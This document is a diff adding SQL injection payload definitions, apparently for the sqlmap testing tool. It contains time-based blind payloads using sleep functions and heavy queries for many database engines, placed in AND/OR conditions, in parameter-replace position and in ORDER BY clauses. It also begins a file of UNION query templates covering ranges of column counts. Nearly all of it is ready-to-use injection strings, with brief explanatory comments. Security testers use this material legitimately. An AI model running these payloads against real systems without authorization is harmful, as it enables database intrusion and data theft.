+ + + HSQLDB > 2.0 AND time-based blind (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 1 + AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END + + AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + > 2.0 +
+
+ + + HSQLDB > 2.0 OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3,9 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + > 2.0 +
+
+ + + HSQLDB > 2.0 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END + + AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + -- + + + + +
+ HSQLDB + > 2.0 +
+
+ + + HSQLDB > 2.0 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + -- + + + + +
+ HSQLDB + > 2.0 +
+
+ + + Informix AND time-based blind (heavy query) + 5 + 2 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + + + + +
+ Informix +
+
+ + + Informix OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + + + + +
+ Informix +
+
+ + + Informix AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + -- + + + + +
+ Informix +
+
+ + + Informix OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + -- + + + + +
+ Informix +
+
+ + + ClickHouse AND time-based blind (heavy query) + 5 + 4 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1))) + + AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000)) + + + + +
+ ClickHouse +
+
+ + + ClickHouse OR time-based blind (heavy query) + 5 + 5 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1))) + + OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000)) + + + + +
+ ClickHouse +
+
+ + + + + + + MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) + 5 + 3 + 2 + 1,2,3,4,5 + 1 + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1) + + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE) + 5 + 5 + 2 + 1,2,3,4,5 + 1 + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1) + + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1) + # + + + + +
+ MySQL + >= 5.0.12 +
+
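Several of the MySQL vectors above fold the tested condition into the sleep argument instead of branching: `SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))` evaluates to `SLEEP([SLEEPTIME])` when the condition holds and to `SLEEP(0)` otherwise. A small Python mirror of that arithmetic, with illustrative values:

```python
def effective_delay(condition_true: bool, sleeptime: int = 5) -> int:
    # IF([INFERENCE],0,[SLEEPTIME]) contributes 0 when the condition holds
    # and the full sleeptime otherwise; the outer subtraction inverts that.
    return sleeptime - (0 if condition_true else sleeptime)

assert effective_delay(True) == 5   # condition true  -> SLEEP(5), delayed response
assert effective_delay(False) == 0  # condition false -> SLEEP(0), immediate response
```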
+ + + + + MySQL >= 5.0.12 time-based blind - Parameter replace + 5 + 2 + 1 + 1,2,3,9 + 3 + (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END) + + (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 time-based blind - Parameter replace (subtraction) + 5 + 3 + 1 + 1,2,3,9 + 3 + (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK) + 5 + 4 + 2 + 1,2,3,9 + 3 + (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]) + + (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]) + + + + +
+ MySQL + < 5.0.12 +
+
+ + + MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 3 + IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL time-based blind - Parameter replace (bool) + 5 + 4 + 1 + 1,2,3,9 + 3 + ([INFERENCE] AND SLEEP([SLEEPTIME])) + + ([RANDNUM]=[RANDNUM] AND SLEEP([SLEEPTIME])) + + + + +
+ MySQL +
+
+ + + MySQL time-based blind - Parameter replace (ELT) + 5 + 5 + 1 + 1,2,3,9 + 3 + ELT([INFERENCE],SLEEP([SLEEPTIME])) + + ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + + + + +
+ MySQL +
+
+ + + MySQL time-based blind - Parameter replace (MAKE_SET) + 5 + 5 + 1 + 1,2,3,9 + 3 + MAKE_SET([INFERENCE],SLEEP([SLEEPTIME])) + + MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + + + + +
+ MySQL +
+
+ + + PostgreSQL > 8.1 time-based blind - Parameter replace + 5 + 3 + 1 + 1,2,3,9 + 3 + (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL time-based blind - Parameter replace (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 3 + (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + + + + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries) + 5 + 4 + 2 + 1,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)) + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + + Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP) + 5 + 3 + 1 + 1,3,9 + 3 + BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END; + + BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END; + + + + +
+ Oracle +
+
+ + + Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE) + 5 + 3 + 1 + 1,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL) + + + + +
+ Oracle +
+
+ + + Oracle time-based blind - Parameter replace (heavy queries) + 5 + 4 + 2 + 1,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL) + + + + +
+ Oracle +
+
+ + + SQLite > 2.0 time-based blind - Parameter replace (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)) + + (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) + + + + +
+ SQLite + > 2.0 +
+
+ + + Firebird time-based blind - Parameter replace (heavy query) + 5 + 5 + 2 + 1,2,3,9 + 3 + IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + (SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + + + + +
+ Firebird + >= 2.0 +
+
+ + + SAP MaxDB time-based blind - Parameter replace (heavy query) + 5 + 5 + 2 + 1,3,9 + 3 + (SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + (SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + + + + +
+ SAP MaxDB +
+
+ + + IBM DB2 time-based blind - Parameter replace (heavy query) + 5 + 5 + 2 + 1,2,3,9 + 3 + (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + + + + +
+ IBM DB2 +
+
+ + + + HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB > 2.0 time-based blind - Parameter replace (heavy query) + 5 + 5 + 2 + 1,2,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0))) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0))) + + + + +
+ HSQLDB + > 2.0 +
+
+ + + Informix time-based blind - Parameter replace (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 3 + (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + + + + +
+ Informix +
+
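The "Parameter replace" entries above differ from the AND/OR ones in placement rather than in the delay primitive: their trailing numeric field is 3 where the AND/OR tests carry 1, which, as far as sqlmap's payload schema is commonly described, means the payload replaces the parameter's original value outright instead of being appended to it; that is why these vectors are bare expressions such as `(CASE WHEN ... THEN SLEEP(...) ... END)`. A hedged sketch of the difference, with a made-up parameter and URL encoding only for illustration:

```python
from urllib.parse import urlencode

original = "13"  # hypothetical value of a vulnerable "id" parameter

# AND/OR placement (e.g. "MySQL >= 5.0.12 AND time-based blind (SLEEP)"):
# the payload is appended to the original value.
appended = {"id": original + " AND SLEEP(5)"}

# Parameter replace placement: the payload becomes the value itself.
replaced = {"id": "(CASE WHEN (1=1) THEN SLEEP(5) ELSE 13 END)"}

print(urlencode(appended))  # id=13+AND+SLEEP%285%29
print(urlencode(replaced))  # id=%28CASE+WHEN+%281%3D1%29+THEN+SLEEP%285%29+ELSE+13+END%29
```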
+ + + + + MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause + 5 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + + + +
+ MySQL + < 5.0.12 +
+
+ + + PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause + 5 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END)) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END)) + + + + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP) + 5 + 3 + 1 + 2,3 + 1 + ,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;) + + ,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;) + + + + +
+ Oracle +
+
+ + + Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE) + 5 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + + +
+ Oracle +
+
+ + + Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + + +
+ Oracle +
+
+ + + HSQLDB >= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) + -- + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB > 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0))) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0))) + + + + +
+ HSQLDB + > 2.0 +
+
+ + +
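All of the tests in this file share the same detection idea: the response to the payload should arrive roughly `[SLEEPTIME]` seconds later when the injected condition is true than when it is false. A rough sketch of that decision follows; `send_request` is a hypothetical callable standing in for the HTTP layer, the fixed 0.8 factor is an arbitrary jitter allowance, and sqlmap's own logic additionally models baseline latency with the standard deviation method mentioned in the changelog further down.

```python
import time

def looks_time_blind(send_request, url, payload_true, payload_false, sleeptime=5):
    """Compare response times for a true-condition and a false-condition payload.
    `send_request(url, payload)` is a hypothetical helper, not part of sqlmap."""
    def timed(payload):
        start = time.monotonic()
        send_request(url, payload)
        return time.monotonic() - start

    delta = timed(payload_true) - timed(payload_false)
    return delta >= sleeptime * 0.8  # crude allowance for network jitter
```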
diff --git a/data/xml/payloads/union_query.xml b/data/xml/payloads/union_query.xml new file mode 100644 index 00000000000..9513892fafb --- /dev/null +++ b/data/xml/payloads/union_query.xml @@ -0,0 +1,742 @@ + + + + + + Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + [COLSTART]-[COLSTOP] + + + + + + + + Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + [COLSTART]-[COLSTOP] + + + + + + + + Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + [COLSTART]-[COLSTOP] + + + + + + + + Generic UNION query ([CHAR]) - 1 to 10 columns + 6 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + 1-10 + + + + + + + + Generic UNION query (NULL) - 1 to 10 columns + 6 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + 1-10 + + + + + + + + Generic UNION query ([RANDNUM]) - 1 to 10 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + 1-10 + + + + + + + + Generic UNION query ([CHAR]) - 11 to 20 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + 11-20 + + + + + + + + Generic UNION query (NULL) - 11 to 20 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + 11-20 + + + + + + + + Generic UNION query ([RANDNUM]) - 11 to 20 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + 11-20 + + + + + + + + Generic UNION query ([CHAR]) - 21 to 30 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + 21-30 + + + + + + + + Generic UNION query (NULL) - 21 to 30 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + 21-30 + + + + + + + + Generic UNION query ([RANDNUM]) - 21 to 30 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + 21-30 + + + + + + + + Generic UNION query ([CHAR]) - 31 to 40 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + 31-40 + + + + + + + + Generic UNION query (NULL) - 31 to 40 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + 31-40 + + + + + + + + Generic UNION query ([RANDNUM]) - 31 to 40 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + 31-40 + + + + + + + + Generic UNION query ([CHAR]) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + 41-50 + + + + + + + Generic UNION query (NULL) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + 41-50 + + + + + + + + Generic UNION query ([RANDNUM]) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + 41-50 + + + + + + + + MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + [COLSTART]-[COLSTOP] + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + [COLSTART]-[COLSTOP] + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + [COLSTART]-[COLSTOP] + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([CHAR]) - 1 to 10 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + 1-10 + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - 1 to 10 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + 1-10 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - 1 to 10 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + 1-10 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([CHAR]) - 11 to 20 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + 11-20 + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - 11 to 20 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + 11-20 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - 11 to 20 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + 11-20 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([CHAR]) - 21 to 30 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + 21-30 + + + + +
+ MySQL +
+
